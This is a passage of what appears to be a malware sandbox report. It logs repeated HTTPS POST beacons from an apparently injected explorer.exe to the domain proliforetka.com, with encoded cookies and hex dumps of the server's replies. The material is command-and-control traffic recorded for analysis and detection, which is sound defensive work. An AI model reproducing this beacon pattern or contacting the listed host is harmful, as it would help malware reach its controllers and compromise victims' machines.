                                                                                                                                Data Ascii: 154mlNrJ8JLu1f9IpwzgDtLG3/Kg+pXqE2zGElegHPbAQLp5exDOPARyFkPbnOYJnlp8AbTj6lDAIfDBkrZGBXnYyz/58udegH0b7H+Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9QPrkDoIlP5VV6h6TMkjSts+sOk2iOtMtwCiJb/9ldrBDmsCniRUdntPYVeLakLcYzyr9F7T9KrHZZYJl3JVuJVsBgyzaaE0PD/
                                                                                                                                2024-12-17 16:57:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                18192.168.2.650012172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:46 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0IYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:47 UTC813INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:47 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FHRW%2Bp5QHJDCL6ews8k%2B0L1M3uUUGvzn8jPAwee%2BxoySoWoaGpY1dkfgTOWg1BGFBKYnTuBxeyeI5OymBda8%2FsjeMaaDyiUAhuesmdq4IlbhXCVaBuBs8v6ERxeiWuetHDzD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874439c1943a6-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=16917&min_rtt=2532&rtt_var=9703&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=1153238&cwnd=179&unsent_bytes=0&cid=3d0fa03cc7664f1b&ts=756&x=0"
                                                                                                                                2024-12-17 16:57:47 UTC347INData Raw: 31 35 34 0d 0a 6d 31 68 73 49 4d 64 50 76 46 66 38 49 5a 49 7a 68 44 5a 48 47 33 33 4f 68 2b 74 57 71 55 47 7a 48 30 52 66 68 48 54 66 42 77 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 59 4a 48 46 67 39 67 62 56 6a 36 78 44 41 49 76 4a 43 6b 48 5a 47 42 58 71 59 53 6e 31 6a 36 57 59 65 67 6a 2f 59 62 65 79 53 2f 42 6a 76 35 6e 51 55 36 46 32 53 79 78 63 63 41 2b 35 42 68 57 53 6e 41 4d 64 4b 4c 48 6a 4c 53 47 7a 52 48 36 35 64 45 56 59 6f 44 32 65 55 43 76 46 52 2f 76 6a 42 49 55 6a 56 50 39 63 37 68 4f 57 4d 55 2b 63 2b 38 2b 73 50 30 6d 70 4f 72 52 41 79 53 47 4e 62 2f 35 6a 4d 73 46 45 78 63 65 35 6c 6a 70 51 30 38 66 45 56 65 62 5a 32 61 49 59 6b 43 6a 67 46 4c 48 79 49 36 7a 4f 64 4a 31 76 6b 39 68 69 4a 78 6c 61 6b 6a 72 64 4d 32 38 49 4e 50
                                                                                                                                Data Ascii: 154m1hsIMdPvFf8IZIzhDZHG33Oh+tWqUGzH0RfhHTfBwLp5exDOPARyFkPbnOYJHFg9gbVj6xDAIvJCkHZGBXqYSn1j6WYegj/YbeyS/Bjv5nQU6F2SyxccA+5BhWSnAMdKLHjLSGzRH65dEVYoD2eUCvFR/vjBIUjVP9c7hOWMU+c+8+sP0mpOrRAySGNb/5jMsFExce5ljpQ08fEVebZ2aIYkCjgFLHyI6zOdJ1vk9hiJxlakjrdM28INP
                                                                                                                                2024-12-17 16:57:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                19192.168.2.650013172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:48 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0IoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:49 UTC814INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:49 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o0IDVkd9UUkMnkTTT%2BWz7FqGyVUxeX4LktSUNvH3GnCPs8wPsdV2yYMONiichljXs0g76f3U3qZl5yjI%2B%2B2vjUqU632%2B70PD6fXOFUHPHhgGgWlnG78sNoVN%2BLjJClot4BJP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874520d36974a-FRA
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=91088&min_rtt=91076&rtt_var=34177&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=32027&cwnd=32&unsent_bytes=0&cid=c7c07dec6056981e&ts=710&x=0"
                                                                                                                                2024-12-17 16:57:49 UTC343INData Raw: 31 35 30 0d 0a 6d 56 39 72 49 73 42 4a 76 31 66 33 4c 5a 59 33 69 54 74 47 47 33 6e 4c 68 2b 4e 55 6f 45 47 7a 47 6b 52 66 6a 48 58 5a 41 41 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 53 4c 33 39 75 38 41 58 53 6a 36 78 44 42 49 58 48 44 45 4c 5a 48 78 6a 6c 59 69 72 38 6a 36 4b 5a 66 77 44 30 61 4c 43 79 53 2f 42 6a 76 35 6e 51 55 36 46 32 53 79 78 63 63 41 2b 35 42 68 57 53 6e 41 4d 64 4b 4c 48 6a 4c 53 47 7a 52 48 36 35 64 45 56 59 6f 44 32 65 55 43 76 42 51 76 50 6d 44 6f 4d 68 56 50 35 56 37 42 57 58 4d 6b 32 63 2f 73 36 71 4f 6b 4f 69 4f 37 52 4c 77 69 32 4f 62 66 78 68 4d 73 46 45 78 63 65 35 6c 6a 70 51 30 38 66 45 56 65 62 5a 32 61 49 59 6b 43 6a 67 46 4c 48 79 49 36 7a 4f 64 4a 31 76 6b 39 68 69 4a 78 6c 61 6b 6a 72 64 4d 32 38 49 4d 50
                                                                                                                                Data Ascii: 150mV9rIsBJv1f3LZY3iTtGG3nLh+NUoEGzGkRfjHXZAALp5exDOPARyFkPbnOSL39u8AXSj6xDBIXHDELZHxjlYir8j6KZfwD0aLCyS/Bjv5nQU6F2SyxccA+5BhWSnAMdKLHjLSGzRH65dEVYoD2eUCvBQvPmDoMhVP5V7BWXMk2c/s6qOkOiO7RLwi2ObfxhMsFExce5ljpQ08fEVebZ2aIYkCjgFLHyI6zOdJ1vk9hiJxlakjrdM28IMP
                                                                                                                                2024-12-17 16:57:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                20192.168.2.650014172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:51 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0I4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:52 UTC811INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:52 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9XrZHT69rvkVDbYCSJ5FSJViXOx2BkwKefjYeRyEVZaz6o114Q70YXCf%2Fh1jfOpICEVShAUrKjyUmq9d%2BdZplN3SX3Kfh4nIRcAARpA0n6DHS1hl%2B2Zpmp8YhcveoK%2FjLzBb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874626c4c4289-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1651&min_rtt=1643&rtt_var=632&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=1709601&cwnd=150&unsent_bytes=0&cid=96d8c75180dff3a8&ts=781&x=0"
                                                                                                                                2024-12-17 16:57:52 UTC347INData Raw: 31 35 34 0d 0a 6c 6c 70 76 49 38 4e 4d 76 31 66 38 4a 70 59 77 68 44 4e 48 47 33 44 4f 67 75 4a 64 72 30 32 7a 46 45 46 66 6a 48 48 66 42 51 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 5a 4c 33 35 71 39 67 4c 53 6a 36 78 44 42 34 50 41 44 30 76 5a 47 52 6a 6a 59 43 33 2b 35 63 75 52 65 51 33 31 61 37 4c 35 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 51 66 50 68 42 49 77 6c 4f 35 56 57 36 42 36 53 4e 6b 76 53 74 73 4f 76 50 6b 4f 70 50 4e 4d 74 78 43 6d 4d 59 2f 74 67 66 4c 42 44 6d 73 43 6e 69 52 55 64 6e 74 50 59 56 65 4c 61 6b 4c 63 59 7a 79 72 39 46 37 54 39 4b 72 48 5a 5a 59 4a 6c 33 4a 56 75 4a 56 73 42 67 79 7a 61 61 45 30 50 44 2f
                                                                                                                                Data Ascii: 154llpvI8NMv1f8JpYwhDNHG3DOguJdr02zFEFfjHHfBQLp5exDOPARyFkPbnOZL35q9gLSj6xDB4PAD0vZGRjjYC3+5cuReQ31a7L5Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9QfPhBIwlO5VW6B6SNkvStsOvPkOpPNMtxCmMY/tgfLBDmsCniRUdntPYVeLakLcYzyr9F7T9KrHZZYJl3JVuJVsBgyzaaE0PD/
                                                                                                                                2024-12-17 16:57:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                21192.168.2.650015172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:53 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0LIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:54 UTC815INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:54 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sg%2BBphv2FQsRHgqzFipfDhg%2FKi73A72%2Bk%2FDxFen3vr7nfoR6kFC7SCWv%2B5yKN6A5AHmQadJbpCzx%2FkF3hSZHQi7VoE9HqnqLoTfTNXMPFDBC9wGyy0w6lEl8SISVzHbMpG3d"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874707af2c330-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1708&rtt_var=647&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=1682027&cwnd=235&unsent_bytes=0&cid=4a4da5f91d86693b&ts=745&x=0"
                                                                                                                                2024-12-17 16:57:54 UTC347INData Raw: 31 35 34 0d 0a 6d 31 68 72 4a 38 42 4f 31 54 76 33 4a 35 59 30 68 6a 55 50 55 58 7a 43 67 75 39 63 71 53 66 65 47 6b 68 57 67 33 6a 64 53 58 50 75 72 4f 4e 4b 50 4f 4d 57 7a 30 64 4f 61 55 32 58 49 48 78 70 38 41 65 34 34 61 64 4f 41 59 48 48 44 67 2b 52 48 42 44 6a 59 79 7a 38 6a 36 4b 66 65 67 33 37 61 37 61 79 53 2f 42 6a 76 35 6e 51 55 36 46 32 53 79 78 63 63 41 2b 35 42 68 57 53 6e 41 4d 64 4b 4c 48 6a 4c 53 47 7a 52 48 36 35 64 45 56 59 6f 44 32 65 55 43 76 45 51 50 62 6e 42 6f 51 67 56 50 74 57 37 52 4b 61 4e 45 47 63 2f 4d 79 72 4f 30 36 6c 4d 72 52 42 78 43 36 4d 59 2f 68 68 4d 73 46 45 78 63 65 35 6c 6a 70 51 30 38 66 45 56 65 62 5a 32 61 49 59 6b 43 6a 67 46 4c 48 79 49 36 7a 4f 64 4a 31 76 6b 39 68 69 4a 78 6c 61 6b 6a 72 64 4d 32 38 49 4d 2f
                                                                                                                                Data Ascii: 154m1hrJ8BO1Tv3J5Y0hjUPUXzCgu9cqSfeGkhWg3jdSXPurONKPOMWz0dOaU2XIHxp8Ae44adOAYHHDg+RHBDjYyz8j6Kfeg37a7ayS/Bjv5nQU6F2SyxccA+5BhWSnAMdKLHjLSGzRH65dEVYoD2eUCvEQPbnBoQgVPtW7RKaNEGc/MyrO06lMrRBxC6MY/hhMsFExce5ljpQ08fEVebZ2aIYkCjgFLHyI6zOdJ1vk9hiJxlakjrdM28IM/
                                                                                                                                2024-12-17 16:57:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                22192.168.2.650016172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:55 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0LYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:56 UTC806INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:56 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CDLumQPWHawGEYUm0wvOtsPuyyWGZTzT%2BDKKt9K9p6k6uzHa8l864xsxBeryCpocVJ8ucPjEx5ytA3P2vcmf7y0HrpETXZ4SkeRkNgEktO43O1Z9lnPYl9aY%2BHYWP8RWSPYA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38747d5cd78cc0-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1985&rtt_var=992&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4218&recv_bytes=1059&delivery_rate=296898&cwnd=222&unsent_bytes=0&cid=fcb8d2f99aeb0b5e&ts=790&x=0"
                                                                                                                                2024-12-17 16:57:56 UTC347INData Raw: 31 35 34 0d 0a 6d 46 4a 6f 4a 38 74 4b 76 56 66 39 49 4a 59 7a 69 44 4e 4b 47 33 37 43 68 75 70 64 72 55 36 7a 47 30 4e 64 6a 48 50 66 41 67 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 55 4a 6e 31 70 39 67 62 66 6a 36 64 47 41 49 62 4a 43 45 48 5a 47 78 66 6d 5a 43 6e 37 35 63 75 51 66 51 7a 34 61 37 50 37 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 51 50 4c 6e 42 6f 4d 6d 4f 5a 56 64 36 42 36 58 4f 6b 72 54 74 73 69 71 4e 30 4f 6c 4f 64 34 74 78 79 36 4b 61 2f 74 74 65 72 42 44 6d 73 43 6e 69 52 55 64 6e 74 50 59 56 65 4c 61 6b 4c 63 59 7a 79 72 39 46 37 54 39 4b 72 48 5a 5a 59 4a 6c 33 4a 56 75 4a 56 73 42 67 79 7a 61 61 45 30 50 44 2f
                                                                                                                                Data Ascii: 154mFJoJ8tKvVf9IJYziDNKG37ChupdrU6zG0NdjHPfAgLp5exDOPARyFkPbnOUJn1p9gbfj6dGAIbJCEHZGxfmZCn75cuQfQz4a7P7Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9QPLnBoMmOZVd6B6XOkrTtsiqN0OlOd4txy6Ka/tterBDmsCniRUdntPYVeLakLcYzyr9F7T9KrHZZYJl3JVuJVsBgyzaaE0PD/
                                                                                                                                2024-12-17 16:57:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                23192.168.2.650017172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:58 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3JIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:59 UTC814INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:58 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ECclHAGdoxxrD7AtASJ4s%2Fo%2FzdvhpNQyJb3Uwgig4mZkC%2F7XPY8vF972reIIJNmo3IhFbUjqfZKdoOpltefb3jE0BclMUlXYNmY%2FEgBoDloLH0fgHndvIuKZ73eLMeUT4AP%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38748dbc17a055-FRA
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=95958&min_rtt=94124&rtt_var=38964&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=26839&cwnd=32&unsent_bytes=0&cid=aaf7c0eb738f522a&ts=999&x=0"
                                                                                                                                2024-12-17 16:57:59 UTC343INData Raw: 31 35 30 0d 0a 6d 46 39 75 49 73 4a 4e 73 6c 66 7a 4a 35 55 32 69 44 42 41 47 33 44 4d 69 65 78 55 72 45 43 7a 48 55 52 66 68 48 66 61 44 41 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 59 49 6e 39 75 38 41 48 66 6a 36 39 43 42 49 58 42 44 30 76 5a 48 78 6a 69 5a 79 48 36 34 38 75 65 63 41 48 2b 62 62 48 36 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 51 66 62 69 42 49 41 6f 4d 35 56 53 37 42 4f 55 4d 41 58 54 38 73 75 6d 4f 6b 6d 6f 56 4e 4e 41 79 53 32 4e 59 2f 30 6f 51 38 59 62 77 74 6d 6d 75 58 63 64 78 39 76 45 55 65 57 51 7a 4b 4a 48 6b 6a 58 6a 45 62 37 37 50 72 76 66 61 35 63 67 33 74 52 67 5a 55 4a 4c 68 44 32 47 45 57 67 33 4d 76
                                                                                                                                Data Ascii: 150mF9uIsJNslfzJ5U2iDBAG3DMiexUrECzHURfhHfaDALp5exDOPARyFkPbnOYIn9u8AHfj69CBIXBD0vZHxjiZyH648uecAH+bbH6Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9QfbiBIAoM5VS7BOUMAXT8sumOkmoVNNAyS2NY/0oQ8YbwtmmuXcdx9vEUeWQzKJHkjXjEb77Prvfa5cg3tRgZUJLhD2GEWg3Mv
                                                                                                                                2024-12-17 16:57:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                24192.168.2.650018172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:00 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3JYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:01 UTC807INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:01 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N4lygRS57b4PxfgR7uunqJzH8dtpKRbHf7XjugBDShkcbn1SMsmWQZRsqs82ol4I71nY4GvX5RWcdsKqJfFvS8HAdQY2g6BzoyeFc6Y%2BvSctF0jXF4MXKFNQH1ADzN2s4qrv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38749b0bc743ad-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=15697&min_rtt=2207&rtt_var=9018&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=1323062&cwnd=203&unsent_bytes=0&cid=436b9d27ff5f9a82&ts=750&x=0"
                                                                                                                                2024-12-17 16:58:01 UTC347INData Raw: 31 35 34 0d 0a 6e 31 4e 74 4a 4d 52 46 75 56 66 33 4c 5a 41 36 68 7a 4a 43 47 33 44 4f 68 4f 31 57 71 45 71 7a 47 45 68 66 68 6e 44 65 41 77 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 56 4c 6e 46 68 38 77 37 52 6a 36 5a 44 41 34 44 45 44 45 62 5a 48 52 54 6d 5a 53 2f 2f 35 63 75 5a 66 77 72 38 62 62 44 2b 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 51 76 48 6c 41 34 49 6b 4f 4a 56 64 37 52 2b 52 4d 45 37 51 74 73 6d 70 4f 55 75 6d 4d 74 73 74 77 79 2b 4e 62 2f 70 6e 65 62 42 44 6d 73 43 6e 69 52 55 64 6e 74 50 59 56 65 4c 61 6b 4c 63 59 7a 79 72 39 46 37 54 39 4b 72 48 5a 5a 59 4a 6c 33 4a 56 75 4a 56 73 42 67 79 7a 61 61 45 30 50 44 2f
                                                                                                                                Data Ascii: 154n1NtJMRFuVf3LZA6hzJCG3DOhO1WqEqzGEhfhnDeAwLp5exDOPARyFkPbnOVLnFh8w7Rj6ZDA4DEDEbZHRTmZS//5cuZfwr8bbD+Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9QvHlA4IkOJVd7R+RME7QtsmpOUumMtstwy+Nb/pnebBDmsCniRUdntPYVeLakLcYzyr9F7T9KrHZZYJl3JVuJVsBgyzaaE0PD/
                                                                                                                                2024-12-17 16:58:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
